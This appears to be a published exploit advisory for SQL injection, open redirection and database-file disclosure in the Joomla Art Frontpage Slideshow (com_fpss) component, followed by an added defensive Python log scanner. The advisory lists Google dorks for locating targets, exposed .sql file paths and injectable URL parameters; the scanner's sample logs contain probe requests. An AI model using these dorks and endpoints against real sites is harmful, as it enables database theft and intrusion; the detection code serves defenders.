####################################################################################################
# Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/01/2019
# Vendor Homepage : artetics.com
# Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow
# Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/
# Affected Versions : 1.5.3 and 1.6.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/index.php?option=com_fpss
#                inurl:''/administrator/components/com_fpss/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
#                      CWE-23 [ Relative Path Traversal ]
#                      CWE-200 [ Information Exposure ]
#                      CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#                      CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################################################
Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
####################################################################################################
# Description :
*************
Art Frontpage Slideshow is a slideshow module that adds front-end animation to attract visitors and lets a site show images of featured products and news in an eye-catching way.
####################################################################################################
# Database Disclosure Exploit :
***************************
/administrator/components/com_fpss/fpss.sql
/administrator/components/com_fpss/install.mysql.sql
# Open Redirection Exploit :
*************************
/index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]
# SQL Injection Exploit :
***********************
/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection]
/index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=atom&lang=[SQL Injection]
/index.php?option=com_fpss&view=article&id=[ID-NUMBER]:article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]
####################################################################################################
# Example Vulnerable Sites :
*************************
####################################################################################################
# Example SQL Database Error :
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1) in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/uadvirtual/public_html/main/libraries/joomla/import.php on line 29
####################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################################################
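Added example, not part of the advisory above: a small access-log scanner, written from the defender's side, that flags requests matching the three com_fpss issues listed in the advisory (direct requests for the bundled .sql files, task=track redirects whose url points to another host, and values in the type, lang and Itemid parameters that do not have the shape a legitimate request would carry). The log lines, host names and IP addresses are constructed placeholders, and the accepted feed types rss/atom are an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Installation/backup SQL files that should never be web-reachable (paths from the advisory).
SQL_FILES = ("/administrator/components/com_fpss/fpss.sql",
             "/administrator/components/com_fpss/install.mysql.sql")
# Parameters the advisory names as injection points, with the shape a legitimate value has
# (keys lower-cased; the rss/atom whitelist for "type" is an assumption, not from the advisory).
EXPECTED = {"type": re.compile(r"^(rss|atom)$", re.I),
            "lang": re.compile(r"^[A-Za-z0-9_-]{1,10}$"),
            "itemid": re.compile(r"^\d+$")}
# Apache/nginx combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target, own_host="www.example.com"):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if any(path.endswith(f) for f in SQL_FILES):
        return "sql_backup_file_request"
    # parse_qs percent-decodes, so an appended %27 shows up as a literal quote here
    q = {k.lower(): v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if q.get("option", "").lower() != "com_fpss":
        return None
    if q.get("task", "").lower() == "track" and "url" in q:
        dest = urlsplit(q["url"])
        if dest.netloc and dest.netloc.lower() != own_host:   # redirect leaves our host
            return "open_redirect_external"
    for name, pattern in EXPECTED.items():
        if name in q and not pattern.match(q[name]):
            return f"sqli_probe:{name}"
    return None

def scan_log(lines, own_host="www.example.com"):
    """Return (client ip, status, label) for every suspicious line in an access log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (label := classify_request(m["target"], own_host)):
            findings.append((m["ip"], m["status"], label))
    return findings

# Constructed sample log (placeholder IPs from 198.51.100.0/24, placeholder external host).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_fpss&task=module&id=27&format=feed&type=atom HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Jan/2019:10:00:02 +0000] "GET /index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27 HTTP/1.1" 500 312',
    '198.51.100.8 - - [19/Jan/2019:10:00:03 +0000] "GET /index.php?option=com_fpss&view=article&id=2:article-3&catid=4:articles&Itemid=450%27 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [19/Jan/2019:10:00:04 +0000] "GET /index.php?option=com_fpss&task=track&id=5&url=http%3A%2F%2Fexternal.invalid%2F HTTP/1.1" 303 0',
    '198.51.100.9 - - [19/Jan/2019:10:00:05 +0000] "GET /administrator/components/com_fpss/install.mysql.sql HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for ip, status, label in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {label}")
```

A 200 on the .sql request means the file was actually served, so that line is the one to act on first; the injection probes are worth alerting on regardless of status.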